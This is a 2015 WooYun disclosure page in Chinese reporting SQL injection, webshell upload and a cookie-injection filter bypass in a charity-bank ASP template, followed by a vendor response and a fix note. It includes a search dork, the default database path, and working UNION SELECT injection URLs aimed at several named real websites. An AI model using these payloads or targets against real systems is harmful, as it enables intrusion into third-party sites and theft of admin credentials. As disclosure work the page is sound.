当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121438

漏洞标题:某银行通用型sql注入/getshell/越权

相关厂商:cncert

漏洞作者: 小龙

提交时间:2015-06-19 13:51

修复时间:2015-09-21 18:16

公开时间:2015-09-21 18:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-19: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向第三方安全合作伙伴开放
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

我是来刷WB的

详细说明:

http://wooyun.org/bugs/wooyun-2010-056967


可以看到直接拿到服务器了。危害不多说

爱心银行.jpg


当然网站不止这么一点的,有些谷歌可能爬不到,下次C段,旁注找到此类网站直接秒,好可怕。。

漏洞证明:

厂商:爱心银行
关键词:inurl:lovebank.asp 现在规模从2014年的96个使用此源码的网站扩展到6000+网站了,非常的快速
是否可以getshell:是 (添加一句话,数据库是asa,并且新闻之类的东西都保存在数据库里面),添加新闻标题内容写一句话进去,然后直接连接数据库
默认数据库:db\#uxdb.asa #换成23%即可
sql注入表:Manage_User


涉及部分网站:

http://wlym.qufushi.com/gl/Manage_Main3edit.asp?ID=45%20xor%201=2%20union%20select%201,2,username,4,5,6,7%20from%20Manage_User
http://www.yzyglm.com/gl/Manage_Main3edit.asp?ID=45%20xor%201=2%20union%20select%201,2,username,4,5,6,7%20from%20Manage_User
http://www.ycyg.net/gl/Manage_Admin.asp 丁卯银行
http://wlym.qufushi.com/gl/Manage_Admin.asp 曲阜市网
http://szddyf.org/gl/Manage_Admin.asp 宿州市埇桥区道东街道办事处
http://aixin.7wa.cc/gl/Manage_Admin.asp 奉节县永安公益服务中心
http://yywgy.com/gl/Manage_Admin.asp 1元微公益爱心联合会
http://www.anjigy.com/gl/Manage_Admin.asp 安吉公益网


并且在:

inc目录下Check_Sql.asp文件也出现了缺陷


On Error Resume Next
'----- 对 get query 值 的过滤.
if request.QueryString<>"" then


'-----对 post 表 单值的过滤.
if request.form<>"" then


就这两个,所以cookie注入没过滤,可以cookie注入
具体不操作了,自己去修复吧

gl\Manage_Main3edit.asp


<%@ language="VBScript"%>
<%response.Expires = 0%>
<!--#include file="conn.asp"-->
<!--#include file="admin.asp"--> 此处没有包含Check_Sql.asp这个文件,导致没有验证直接带入数据进数据库
<%
id=request("id")
set rs=server.createobject("adodb.recordset")
sqltext="select * from Manage_User where Id=" & id (此句典型注入漏洞,ID参数没过滤严谨)
rs.open sqltext,conn,1,1
%>

修复方案:

1:过滤sql注入

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-23 18:15

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无